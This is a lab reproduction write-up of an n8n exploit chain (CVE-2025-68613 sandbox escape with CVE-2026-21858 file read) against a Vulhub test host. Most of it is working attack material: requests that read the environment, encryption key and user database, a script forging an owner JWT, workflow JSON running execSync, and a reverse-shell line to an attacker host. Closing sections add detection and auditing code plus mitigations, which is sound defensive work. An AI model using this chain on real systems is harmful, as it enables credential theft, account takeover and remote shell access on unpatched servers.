n8n Expression Sandbox Escape to RCE - CVE-2025-68613
Introduction
n8n is an open-source workflow automation platform that lets users connect services through a visual, node-based interface.
CVE-2025-68613 is a critical vulnerability (CVSS 9.9) in n8n's server-side expression evaluation engine, affecting versions 0.211.0 through 1.120.3. n8n lets users embed JavaScript expressions wrapped in {{ }} in workflow node parameters; these expressions are evaluated by the server at run time. Because the sandbox isolation is insufficient, an authenticated user can craft a malicious expression that escapes the intended execution context, reaches the Node.js process global object, and uses child_process.execSync() to run arbitrary operating system commands with the privileges of the n8n process. The vulnerability requires authentication, but it can be chained with CVE-2026-21858 (unauthenticated arbitrary file read via Content-Type confusion) to achieve unauthenticated remote code execution.
Lab setup
n8n Version: 1.65.0
# vulhub
cd vulhub/n8n/CVE-2025-68613
docker-compose up -d
Open http://ip:5678
Administrator account: admin@vulhub.org / Vulhub123
Upload endpoint: /form/vulnerable-form
Vulhub ships an exploit: exploit.py
Reproduction
Chaining with CVE-2026-21858
CVE-2026-21858: 1.65.0 <= n8n < 1.121.0 (NVD - CVE-2026-21858)
Send a request to the path /form/vulnerable-form
Obtain the encryption key
POST /form/vulnerable-form HTTP/1.1
Host: 10.143.240.136:5678
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json

{
  "data": {},
  "files": {
    "f-abc123": {
      "filepath": "/proc/self/environ",
      "originalFilename": "payload.bin",
      "mimetype": "application/octet-stream",
      "size": 50000
    }
  }
}
The environment shows the home directory is /root; reading /root/.n8n/config yields the encryption key
{
  "encryptionKey": "FgjsgVl8FcUaQrny8/J2rOuNssPIsOen"
}
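As an added detection example (not part of the original writeup and not n8n code), the following Python checks request records for the pattern above: a JSON body on a form path that supplies its own files[...].filepath instead of a normal multipart upload. The request records are constructed; /form/ is the path shown on this page, and the /form-test/ and /form-waiting/ paths are included on the assumption that they are n8n's other form-submission endpoints.

```python
import json
import re

# Constructed request records (as a reverse proxy might log them); the second
# one mirrors the JSON body shown in the writeup above.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/form/vulnerable-form",
     "content_type": "multipart/form-data; boundary=----abc", "body": ""},
    {"method": "POST", "path": "/form/vulnerable-form",
     "content_type": "application/json",
     "body": json.dumps({"data": {}, "files": {"f-abc123": {
         "filepath": "/proc/self/environ", "originalFilename": "payload.bin",
         "mimetype": "application/octet-stream", "size": 50000}}})},
    {"method": "POST", "path": "/rest/workflows", "content_type": "application/json",
     "body": json.dumps({"name": "ok", "nodes": []})},
]

# /form/ is the path used on this page; form-test and form-waiting are assumed
# to be n8n's other form-submission endpoints and are checked the same way.
FORM_PATH = re.compile(r"^/form(-test|-waiting)?/")


def check_form_request(req):
    """Return the reasons a request looks like the Content-Type confusion above.

    A browser form submission is multipart/form-data and the server decides where
    uploads land; a JSON 'files' map with 'filepath' entries is the client naming
    server-side files, which is exactly what the file read abuses.
    """
    reasons = []
    if req.get("method") != "POST" or not FORM_PATH.match(req.get("path", "")):
        return reasons
    ctype = req.get("content_type", "").lower()
    if ctype.startswith("multipart/form-data"):
        return reasons
    reasons.append(f"non-multipart form submission ({ctype or 'no content-type'})")
    try:
        body = json.loads(req.get("body") or "{}")
    except json.JSONDecodeError:
        return reasons
    files = body.get("files") if isinstance(body, dict) else None
    if isinstance(files, dict):
        for name, meta in files.items():
            path = meta.get("filepath") if isinstance(meta, dict) else None
            if path:
                reasons.append(f"client-supplied filepath {path!r} in files[{name!r}]")
    return reasons


def scan(requests):
    """Index -> reasons for every suspicious request in a batch."""
    return {i: r for i, r in enumerate(map(check_form_request, requests)) if r}
```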
User credentials
Read the database file
curl -s http://10.143.240.136:5678/form/vulnerable-form -H "Content-Type: application/json" -d '{"data":{},"files":{"f-1":{"filepath":"/root/.n8n/database.sqlite","originalFilename":"a.bin","mimetype":"application/octet-stream","size":50000}}}' -o database.sqlite
Extract the user credentials
sqlite3 database.sqlite
sqlite> SELECT id, email, password FROM user WHERE role='global:owner';
360b3c02-7936-457f-a920-25d22121bf82|admin@vulhub.org|$2a$10$rM6Uicv7X.RfH1.YfaQVXuT0JMIHOizbtuMOcFjk3CPvwETigphba
Forge a JWT
import hashlib
from base64 import b64encode

import jwt

key = "FgjsgVl8FcUaQrny8/J2rOuNssPIsOen"
uid = "360b3c02-7936-457f-a920-25d22121bf82"
email = "admin@vulhub.org"
pw_hash = "$2a$10$rM6Uicv7X.RfH1.YfaQVXuT0JMIHOizbtuMOcFjk3CPvwETigphba"
secret = hashlib.sha256(key[::2].encode()).hexdigest()
h = b64encode(hashlib.sha256(f"{email}:{pw_hash}".encode()).digest()).decode()[:10]
token = jwt.encode({"id": uid, "hash": h}, secret, "HS256")
print(f"n8n-auth={token}")
Generated token
n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw
Verify
curl http://10.143.240.136:5678/rest/users -H "Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw"
Comparing the response confirms the cookie is valid
Create a workflow
POST /rest/workflows HTTP/1.1
Host: 10.143.240.136:5678
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.143.240.136:5678/form/vulnerable-form
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw
Content-Type: application/json

{
  "name": "exploit-workflow",
  "active": false,
  "nodes": [
    {
      "parameters": {},
      "name": "Trigger",
      "type": "n8n-nodes-base.manualTrigger",
      "typeVersion": 1,
      "position": [250, 300]
    },
    {
      "parameters": {
        "values": {
          "string": [
            {
              "name": "result",
              "value": "={{ (function() { var require = this.process.mainModule.require; var execSync = require(\"child_process\").execSync; return execSync(\"whoami\").toString(); })() }}"
            }
          ]
        }
      },
      "name": "RCE",
      "type": "n8n-nodes-base.set",
      "typeVersion": 2,
      "position": [450, 300]
    }
  ],
  "connections": {
    "Trigger": {
      "main": [
        [
          {
            "node": "RCE",
            "type": "main",
            "index": 0
          }
        ]
      ]
    }
  },
  "settings": {}
}
Workflow id: h2Ee7iIss7wSfInm
Run the workflow
POST /rest/workflows/h2Ee7iIss7wSfInm/run HTTP/1.1
Host: 10.143.240.136:5678
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.143.240.136:5678/form/vulnerable-form
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw
Content-Type: application/json

{
  "workflowData": {
    "id": "h2Ee7iIss7wSfInm",
    "name": "exploit-workflow",
    "active": false,
    "nodes": [
      {
        "parameters": {},
        "name": "Trigger",
        "type": "n8n-nodes-base.manualTrigger",
        "typeVersion": 1,
        "position": [250, 300]
      },
      {
        "parameters": {
          "values": {
            "string": [
              {
                "name": "result",
                "value": "={{ (function() { var require = this.process.mainModule.require; var execSync = require(\"child_process\").execSync; return execSync(\"whoami\").toString(); })() }}"
              }
            ]
          }
        },
        "name": "RCE",
        "type": "n8n-nodes-base.set",
        "typeVersion": 2,
        "position": [450, 300]
      }
    ],
    "connections": {
      "Trigger": {
        "main": [
          [
            {
              "node": "RCE",
              "type": "main",
              "index": 0
            }
          ]
        ]
      }
    },
    "settings": {}
  }
}
View the result
Note the executionId: 39
GET /rest/executions/39 HTTP/1.1
Host: 10.143.240.136:5678
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw
Change whoami to env
Reverse shell:
In the run-workflow request, replace whoami with bash -c 'bash -i >& /dev/tcp/attacker-ip/4343 0>&1'
Delete the workflow
DELETE /rest/workflows/h2Ee7iIss7wSfInm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjM2MGIzYzAyLTc5MzYtNDU3Zi1hOTIwLTI1ZDIyMTIxYmY4MiIsImhhc2giOiJWWjZiK1hqbGtoIn0.bEYjBiRxi6O83VQANDa9ttvwr9HChxxYIwyPzUjS7Yw
Host: 10.143.240.136:5678
Referer: http://10.143.240.136:5678/form/vulnerable-form
Manual method
On the login page, press F12 to open the developer tools and add the cookie under "Application"
Refresh the page; once in the admin panel, add a workflow
"Add first step…"
Search for "Manual Trigger" and click it
Then search for "Edit Fields (Set)" and click it
"Drag input fields here or Add Field"
Set the name field to "result" and enter the following in the string field
{{ (function(){ return this.process.mainModule.require('child_process').execSync('env').toString() })() }}
Select "Expression", then "Test step" to run the code
Reference: Reproducing the n8n RCE (CVE-2025-68613, CVSS 9.9) exploit, detailed version - Tencent Cloud Developer Community
Exploit usage
python exploit.py http://ip:5678 /form/vulnerable-form --cmd env
Mitigation
- Upgrade to 1.122.0 or later
- Allow only fully trusted users to create and edit workflows
- Deploy n8n in a controlled environment with restricted operating system privileges and network access
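As an added example for the mitigation list (not part of the original writeup and not n8n code), the following Python audits an exported workflow for expressions that reach for Node.js internals the way the payload on this page does. The workflow export is constructed in the shape used above; the identifier list is this example's own choice, not a rule n8n ships.

```python
import re

# Constructed workflow export in the shape used in the writeup above; the
# "RCE" node carries the expression shown on this page, "Greeting" is benign.
WORKFLOW = {
    "name": "exploit-workflow",
    "nodes": [
        {"name": "Trigger", "type": "n8n-nodes-base.manualTrigger", "parameters": {}},
        {"name": "RCE", "type": "n8n-nodes-base.set", "parameters": {"values": {"string": [
            {"name": "result",
             "value": "={{ (function() { var require = this.process.mainModule.require; "
                      "var execSync = require(\"child_process\").execSync; "
                      "return execSync(\"whoami\").toString(); })() }}"}]}}},
        {"name": "Greeting", "type": "n8n-nodes-base.set", "parameters": {"values": {"string": [
            {"name": "msg", "value": "={{ 'Hello ' + $json.name }}"}]}}},
    ],
}

EXPR = re.compile(r"\{\{(.*?)\}\}", re.DOTALL)
# Identifiers a workflow expression has no business touching: each is a step on
# the path from the expression context to Node.js internals (process, require).
SUSPICIOUS = re.compile(
    r"\b(process|mainModule|require|child_process|exec(?:Sync)?|spawn(?:Sync)?"
    r"|constructor|globalThis|global|Function|eval)\b")

def walk(value, path=""):
    """Yield (parameter path, string) for every string in a nested parameters value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for k, v in value.items():
            yield from walk(v, f"{path}.{k}" if path else k)
    elif isinstance(value, list):
        for i, v in enumerate(value):
            yield from walk(v, f"{path}[{i}]")

def audit_workflow(workflow):
    """Return (node name, parameter path, matched identifiers) for risky expressions."""
    findings = []
    for node in workflow.get("nodes", []):
        for path, text in walk(node.get("parameters", {})):
            if not text.startswith("="):  # n8n prefixes expression-mode values with '='
                continue
            for expr in EXPR.findall(text):
                hits = sorted({m.group(1) for m in SUSPICIOUS.finditer(expr)})
                if hits:
                    findings.append((node["name"], path, hits))
    return findings
```

Run it over each workflow exported from an instance before and after the upgrade; a hit is a workflow to review by hand, not proof of compromise, since `constructor` or `global` can appear in legitimate code.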